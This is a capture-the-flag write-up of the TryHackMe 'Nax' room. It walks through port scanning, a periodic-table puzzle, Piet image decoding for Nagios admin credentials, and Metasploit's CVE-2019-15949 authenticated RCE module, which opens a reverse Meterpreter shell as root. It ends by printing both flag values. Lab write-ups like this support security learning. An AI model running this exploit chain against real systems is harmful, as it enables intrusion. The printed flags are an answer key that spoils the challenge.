This is my first write-up, I hope you will enjoy. If you find any difficulty, try to fix it..although you are a hacker.
Checking on Google ‘most powerful and trusted network monitoring software on the market’, found a name similar to our room ‘Nagios XI’.
Now let’s begin with the enumeration:
┌──(root💀Luc1f3r)-[~/THM/Nax]
└─# rustscan -a 10.10.108.22 — ulimit 5000
. — — . .-. .-. . — — .. — -. . — — . . — -. . — . .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-’ `-’` — — -’` — — ‘ `-’ ` — — ‘ ` — -’ `-’ `-’`-’ `-’
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
— — — — — — — — — — — — — — — — — — —
🌍HACK THE PLANET🌍
[~] The config file is expected to be at “/root/.rustscan.toml”
[~] Automatically increasing ulimit value to 5000.
Open 10.10.108.22:22
Open 10.10.108.22:25
Open 10.10.108.22:80
Open 10.10.108.22:389
Open 10.10.108.22:443
Open 10.10.108.22:5667
Found all the open ports, now starting with the weakest link i.e. http service, we found a cryptic message:
Welcome to elements.
Ag — Hg — Ta — Sb — Po — Pd — Hg — Pt — Lr
Decoding them as per the Periodic Table (to decimal value):
47 80 73 51 84 46 80 78 103 > /PI3T.PNg
Hidden File: PI3T.PNg
┌──(root💀Luc1f3r)-[~/THM/Nax]
└─# wget http://10.10.108.22/PI3T.PNg
Download and decrypt the image (https://0xrick.github.io/lists/stego/). As the image refers to Piet programming language.
Using the link I got the credentials: nagiosadmin:n3p3UQ&9BjLp4$7uhWdY
Username: nagiosadmin
Password: n3p3UQ&9BjLp4$7uhWdY
Got the directories using feroxbuster (one of my favorite tool):
┌──(root💀Luc1f3r)-[~/THM/Nax]
└─# feroxbuster — url http://10.10.108.22/
http://10.10.108.22/
http://10.10.108.22/javascript
http://10.10.108.22/javascript/jquery
http://10.10.108.22/javascript/jquery/
http://10.10.108.22/javascript/jquery/jquery
http://10.10.108.22/server-status
http://10.10.108.22/nagios(interesting)
Checking further information on google, found a network monitoring software names Nagios XI, with default path as /nagiosxi
Logging in via Web-Browser, gave us the access to the Nagios Control Panel. Checking for the possible exploit:
> https://www.exploit-db.com/exploits/48191
> https://nvd.nist.gov/vuln/detail/CVE-2019-15949
>https://github.com/jakgibb/nagiosxi-root-rce-exploit
Vulnerability: CVE-2019–15949, which could lead to authenticated RCE.
Confirmed the exploit using Metasploit:
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
[*] Attempting to authenticate to Nagios XI…
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable to the following 5 exploit(s):
[*] CVE-2018–15708, CVE-2018–15710 exploit/linux/http/nagios_xi_magpie_debug
[*] CVE-2019–15949 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
[*] CVE-2020–35578 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] CVE-2020–5792 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] CVE-2021–37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Let’s Hack…
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[*] Started reverse TCP handler on 10.8.93.34:9001
[*] Running automatic check (“set AutoCheck false” to disable)
[*] Attempting to authenticate to Nagios XI…
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable.
[*] Uploading malicious ‘check_ping’ plugin…
[*] Command Stager progress — 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin…
[*] Waiting up to 300 seconds for the plugin to request the final payload…
[*] Sending stage (3020772 bytes) to 10.10.108.22
[*] Meterpreter session 1 opened (10.8.93.34:9001 -> 10.10.108.22:59298 ) at 2022–03–24 16:10:46 +0530
[*] Deleting malicious ‘check_ping’ plugin…
[+] Plugin deleted.
meterpreter > shell
Process 31417 created.
Channel 1 created.
whoami
root
which python
/usr/bin/python
python -c ‘import pty; pty.spawn(“/bin/bash”)’
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile#
No privilege Escalation required, as we got the root access, get the flags. And we are done for the day:
root@ubuntu:~# cat root.txt
THM{c89b2e39c83067503a6508b21ed6e962}
root@ubuntu:/home/galand# cat user.txt
THM{84b17add1d72a9f2e99c33bc568ae0f1}
Thank you for going through the article. Keep Hacking.
